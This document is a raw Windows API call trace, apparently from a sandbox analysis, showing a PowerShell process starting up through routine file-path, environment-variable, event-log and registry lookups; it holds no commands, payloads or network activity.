	[0846.340] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0851.091] SetErrorMode (uMode=0x1) returned 0x1
	[0851.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0851.091] SetErrorMode (uMode=0x1) returned 0x1
	[0851.091] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0851.091] SetErrorMode (uMode=0x1) returned 0x1
	[0851.092] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0851.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0851.092] CoTaskMemFree (pv=0x2a6660) 
	[0851.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0851.095] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0851.095] SetErrorMode (uMode=0x1) returned 0x1
	[0851.095] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0851.095] SetErrorMode (uMode=0x1) returned 0x1
	[0851.095] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0851.095] SetErrorMode (uMode=0x1) returned 0x1
	[0851.096] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0851.096] SetErrorMode (uMode=0x1) returned 0x1
	[0851.096] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0851.096] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0851.096] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0851.096] SetErrorMode (uMode=0x1) returned 0x1
	[0851.096] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0851.096] SetErrorMode (uMode=0x1) returned 0x1
	[0851.096] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0851.096] SetErrorMode (uMode=0x1) returned 0x1
	[0851.097] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0851.097] SetErrorMode (uMode=0x1) returned 0x1
	[0851.097] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0851.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0851.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0851.097] SetErrorMode (uMode=0x1) returned 0x1
	[0851.097] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0851.097] SetErrorMode (uMode=0x1) returned 0x1
	[0851.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0851.097] SetErrorMode (uMode=0x1) returned 0x1
	[0851.097] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d4f0 | out: lpFileInformation=0x12d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0851.098] SetErrorMode (uMode=0x1) returned 0x1
	[0851.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0851.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0851.098] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0851.098] SetErrorMode (uMode=0x1) returned 0x1
	[0851.098] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0851.098] SetErrorMode (uMode=0x1) returned 0x1
	[0851.098] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0851.099] SetErrorMode (uMode=0x1) returned 0x1
	[0851.099] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0851.099] SetErrorMode (uMode=0x1) returned 0x1
	[0851.099] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0851.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12d220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0851.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0851.099] SetErrorMode (uMode=0x1) returned 0x1
	[0851.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0851.099] SetErrorMode (uMode=0x1) returned 0x1
	[0851.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0851.100] SetErrorMode (uMode=0x1) returned 0x1
	[0851.100] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d530 | out: lpFileInformation=0x12d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0851.100] SetErrorMode (uMode=0x1) returned 0x1
	[0851.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0851.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12d220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0851.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0851.102] SetErrorMode (uMode=0x1) returned 0x1
	[0851.102] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d7f0 | out: lpFileInformation=0x12d7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0851.103] SetErrorMode (uMode=0x1) returned 0x1
	[0851.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0851.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0851.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0851.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.751] CoTaskMemAlloc (cb=0x804) returned 0x1b864860
	[0852.751] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b864860, nSize=0x12db58 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12db58) returned 0x1
	[0852.752] CoTaskMemFree (pv=0x1b864860) 
	[0852.752] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0852.752] GetUserNameW (in: lpBuffer=0x283d90, pcbBuffer=0x12db98 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12db98) returned 1
	[0852.752] CoTaskMemFree (pv=0x283d90) 
	[0852.753] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3088500*="Available", lpRawData=0x3088290) returned 1
	[0852.847] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0852.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0852.847] CoTaskMemFree (pv=0x2a6660) 
	[0852.849] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0852.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0852.849] CoTaskMemFree (pv=0x2a6660) 
	[0852.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.855] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0852.855] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0852.855] CoTaskMemFree (pv=0x2a6660) 
	[0852.855] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0852.856] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0852.856] CoTaskMemFree (pv=0x2a6660) 
	[0852.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.858] GetCurrentProcessId () returned 0xe88
	[0852.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.863] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12db78 | out: phkResult=0x12db78*=0x380) returned 0x0
	[0852.863] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dafc, lpData=0x0, lpcbData=0x12daf8*=0x0 | out: lpType=0x12dafc*=0x1, lpData=0x0, lpcbData=0x12daf8*=0x56) returned 0x0
	[0852.863] CoTaskMemAlloc (cb=0x5a) returned 0x1b849cf0
